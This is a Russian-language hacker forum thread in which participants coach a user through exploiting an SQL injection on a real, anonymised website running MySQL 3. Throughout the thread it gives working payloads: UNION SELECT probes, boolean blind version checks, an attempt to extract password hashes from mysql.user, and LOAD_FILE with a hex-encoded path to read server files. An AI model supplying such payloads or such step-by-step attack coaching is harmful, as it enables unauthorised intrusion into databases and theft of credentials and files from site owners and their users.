юзай sql injection tool 4

1. Ты подставляешь юнион к существующему значению, а надо к несуществующему (...1+and+1=2+union+...).
2. Возможно там несколько запросов (в таком случае посимвольный брут).
3. Версия мускула = 3 (+and+substring(version(),1,1)=3 - это что бы проверить) и следовательно подзапросы не поддерживаются.

Читай статью:
https://forum.antichat.ru/threadnav43966-1-10.html

м.б. там просто 3 версия секеля и нет юниона ;-)?

Если четвёртая версия это ещё не означает поддержку подзапросов.Вот какая точная версия,с которой начинается поддержка подзапросов - не помню...).Про третью вообще молчу))

Подзапросы поддерживаются MySQL >4.1
Правда, тут о них речи не было, UNION не является частью подзапроса.
Подзапрос имеется, скажем, в этом примере:
или

Хыхы))А мне всегда почему-то казалось, что подзапрос -

это выражения вида 1+and+substring(version(),1,1)=5;

или 1+and+1=5+union+select; Выполнится второй

запрос,а первый улетает.Так эт чо - один большой запрос или всё же два?)).

Уф...

Это не подзапрос, а использование логического опретора and.

В запросе получается что то вроде этого:

select title from page where page_id=[sql inj]
Смысл запроса вывести заголовок указанной страницы.

Сюда ты и подставляешь данные:

select title from page where page_id=1 and substring(version(),1,1)=5
Смысл вывести заголовок указанной страницы и первый символ версии БД должен быть равен 5.
Т.е. запрос выполнится успешно если верси БД равна 5.

substring() и version() это функции.
В данном примере ты используешь логический опрератор and и две функции, а подзапросы не используешь.

Ограничиваясь такими логическими посимвольными учтонениями запроса, используя только функции и не используя подзапросы максимум что ты можешь сделать это вывести содержимое файла (и то если пользователь БД обладает соотвествующими правами) - подробнее тут => Работа с MySQL третьей версии...

union - это опретор объединяющий два запроса:

select title from page where page_id=1 and substring(version(),1,1)=5 union select 1
В данном случае если версия БД не равна 5, то выведется еденица.

Подробнее тут => SQL injection полный FAQ

Подзапросы используются для работы со слепыми инъекциями:

select title from page where page_id=1 and (select 1 from user limit 0,1)=1

Подробнее про слепые инъекции тут => SQL инъекция FAQ (в т.ч. и blind SQL)

P.S. а вообще очень советую купить справочник/учебник по синтаксису sql.

попробуй site.com/?nr=-9999+union+select+1,2,3,4/* несуществующее значание

попробовал, также не подходит)
Но немного пораздумав и почитав, что Grey написал, попробовал логические запросы с and.

Как и ожидалось версия оказалась 3.х и соответственно union не поддерживаются С помощью перлового скрипта перебрал user(), version(), database().
Запрос, типа site.com/?nr=1+and+ascii(substring((select+password+from+my sql.user),1,1))>1/*
тоже не проканал, то ли это расценено как подзапрос, то ли доступа к mysql.user закрыт.

Статья Grey о том как сливать файлы в 3-й версии, если есть доступ, наталкнула на такой запрос
http://site.com/?nr=1&n=1+and+ascii(substring((LOAD_FILE(0x2f77777 72f777777382f757a2f64656661756c742e68746d)),100,1) )>1/*

При его подачи ошибок нет, но и добиться, чтобы условие выполнилось, тоже не смог (захексин путь до файла, который выводится при ошибочной квери)